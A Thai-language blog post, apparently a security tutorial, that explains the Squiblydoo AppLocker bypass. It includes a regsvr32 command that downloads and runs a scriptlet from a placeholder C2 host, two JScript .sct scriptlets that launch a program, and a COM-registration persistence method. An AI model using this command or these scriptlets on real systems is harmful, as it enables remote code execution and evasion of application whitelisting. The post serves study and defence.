จริงๆโพสต์นี้ถือเป็นการ update ความรู้เรื่อง bypass security กันหน่อย โดยเทคนิคชื่อว่า “Squiblydoo” ซึ่งเป็นเทคนิคที่ใช้สำหรับการ bypass AppLocker (สำหรับการทำ whitelist application) นั่นเอง
“Squiblydoo” ซึ่งเป็นเทคนิคที่กระทำในช่วง Post Exploitation หรือก็คือยึดเครื่องได้แล้วนั่นเอง ซึ่งหากมี AppLocker อยู่ เราสามารถใช้เทคนิคนี้ในการ bypass แล้ว run application ที่ถูก restrict ไว้ได้
Squiblydoo เป็นเทคนิคที่ทำให้ user ธรรมดาสามารถ download script และรัน script ได้ทันที โดยใช้ valid Microsoft tool อย่าง regsvr32.exe ซึ่งปกติเอาไว้ register หรือ unregister OLE object ไฟล์ (เช่น DLL, ActiveX เป็นต้น) ได้นั่นเอง
Attacker จะใช้ ActiveX format เพื่อจะฝัง VB, JS เข้าไปใน XML file แล้วทำการรัน ActiveX นั้นอีกที
|
1 |
regsvr32.exe /s /i:http://c2/backdoor.sct scrobj.dll |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
<?XML version="1.0"?> <scriptlet> <registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}" > <script language="JScript"> <![CDATA[ var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> |
หากจะทำเป็นแบบ persistence ก็สามารถทำได้เช่นกัน โดยการ register COM Object ไป แต่การกระทำดังกล่าว user ต้องมีสิทธิ์เป็น administrator โดยเมื่อมีการ create ActiveX Object ใหม่ ตัวไฟล์จะถูกเขียนภายใต้ HKEY_CLASSES_ROOT และ HKEY_LOCAL_MACHINE
|
1 2 |
var test = new ActiveXObject("Component.TESTCB"); test.exec() |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
<?XML version="1.0"?> <scriptlet> <registration description="Component" progid="Component.TESTCB" version="1.00" classid="{20002222-0000-0000-0000-000000000002}" > </registration> <public> <method name="exec"> </method> </public> <script language="JScript"> <![CDATA[ function exec(){ new ActiveXObject('WScript.Shell').Run('calc.exe'); } ]]> </script> </scriptlet> |
Source:: CarbonBlack
You May also Like
LINE@Techsuii.com
